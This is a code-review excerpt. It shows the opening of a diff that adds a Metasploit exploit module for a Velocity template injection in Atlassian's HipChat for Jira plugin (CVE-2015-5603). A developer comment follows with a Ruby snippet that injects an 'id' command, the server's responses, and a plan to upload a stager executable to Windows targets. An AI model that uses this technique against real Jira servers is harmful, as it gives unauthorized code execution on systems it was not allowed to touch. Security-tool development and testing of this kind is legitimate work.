modules/exploits/unix/webapp/jira_hipchat_template.rb

```diff
@@ -0,0 +1,447 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'json'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Atlassian HipChat for Jira Plugin Velocity Template Injection",
+      'Description'    => %q{
+        Atlassian Hipchat is a web service for internal instant messaging. A plugin is available
+        for Jira that allows team collibration at real time. A message can be used to inject Java
+        code into a Velocity template, and gain code exeuction as Jira. Authentication is required
+        to exploit this vulnerability, and you must make sure the account you're using isn't
+        protected by captcha.
+
+        HipChat for Jira plugin versions between 1.3.2 and 6.30.0 are affected. Jira versions
+        between 6.3.5 and 6.4.10 are also affected by default, because they were bundled with
+        a vulnerable copy of HipChat.
+
+        When using the check command, if you supply a valid username and password, the module
+        will be able to trigger the bug and check more accurately. If not, it falls back to
+        passive, which can only tell if the target is running on a Jira version that is bundled
+        with a vulnerable copy of Hipchat by default, which is less reliable.
+
+        This vulnerability was originally discovered internally by Atlassian.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Chris Wood', # PoC
+          'sinn3r'      # Metasploit
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2015-5603' ],
+          [ 'EDB', '38551' ],
+          [ 'BID', '76698' ],
+          [ 'URL', 'https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html' ]
+        ],
+      'Platform'       => 'linux',
```

Comment:
So my tests might be leading incorrect results, but here's how I concluded why I couldn't call ```java```:

In the module I can simply do this, and then print the HTTP response to see if the server is happy executing my command:

```ruby
      cookie = do_login
      c = get_exec_code('id')
      res = inject_template(c, cookie)
      $stderr.puts res.body
```

If I execute commands such as ```id```, ```whoami```, or ```echo```, it seems pretty happy executing my stuff by returning this:

```
{"message":"0"}
```

If I execute something random (like a random string), here's what happens:

```
<html><head><title>Apache Tomcat/7.0.55 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 400 - Bad Request</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Bad Request</u></p><p><b>description</b> <u>The request sent by the client was syntactically incorrect.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.55</h3></body></html>
```

OK, moment of truth: if I execute ```java``` or ```/usr/share/java``` (according to ```whereis java```, this is where Java is), here's what happens:

```
<html><head><title>Apache Tomcat/7.0.55 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 400 - Bad Request</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Bad Request</u></p><p><b>description</b> <u>The request sent by the client was syntactically incorrect.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.55</h3></body></html>
```

It doesn't look like it's happy executing java.

So I figured to support Windows, I would have to use the code injection bug to call ```System.getProperty("os.name")```, generate and upload an executable with a stager based on that, and then hopefully execute.